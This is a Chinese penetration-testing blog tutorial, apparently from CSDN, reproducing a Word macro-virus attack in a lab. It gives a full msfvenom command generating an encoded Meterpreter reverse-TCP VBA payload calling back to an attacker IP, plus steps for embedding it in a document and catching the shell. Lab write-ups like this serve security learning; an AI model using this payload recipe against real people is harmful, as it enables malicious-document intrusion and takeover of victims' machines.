MSF利用宏病毒感染word文档获取shell复现

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、环境准备

在本文中,我们尝试使用MSF生成宏病毒,制作一个携带宏病毒的word文档,并尝试渗透一个Windows7设备。
在本次实战中,我们的Windows7设备上要安装Office2007软件,并且启用宏功能。

二、宏文档生成

首先,我们来生成一个携带宏病毒的word文档,执行命令:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.136.199 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f vba-exe

在上述命令中,-f参数后面是vba-exe,表示生成一个VB的宏脚本。
可以生成一个宏木马,该命令执行结果如下所示:
在这里插入图片描述
该命令的执行结果分为两部分,一部分是宏代码,如下所示:
在这里插入图片描述
另一部分是文档中的内容,如下所示:
在这里插入图片描述
我们打开一个word文档,在“视图”页面,来创建一个“宏”,我们输入宏名(随意),接下来,宏的位置这里我们选择在文档内部,如下所示:
在这里插入图片描述
之后,我们将Kali Linux上刚才生成的宏部分粘贴到word文档处,如下所示:
在这里插入图片描述
然后,我们再把文档部分粘贴到word文档中,如下所示:
在这里插入图片描述
这样,我们的宏文件就生成了。

三、效果检验

最后,我们来检验一下刚才配置的结果。
在Kali Linux上,我们使用exploit/multi/handler模块,并设置payload和各项参数如下所示:
在这里插入图片描述
之后,我们运行该模块开启监听。此时,我们在Windows设备上,打开该文档,发现并没有发现任何现象。但是当我们回到Kali Linux时,我们会发现已经获取到了Windows主机的连接,如下所示:
在这里插入图片描述
从上图可以看出,我们获取到了目标Windows7设备的管理员权限。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

猜你喜欢

转载自blog.csdn.net/weixin_40228200/article/details/125240360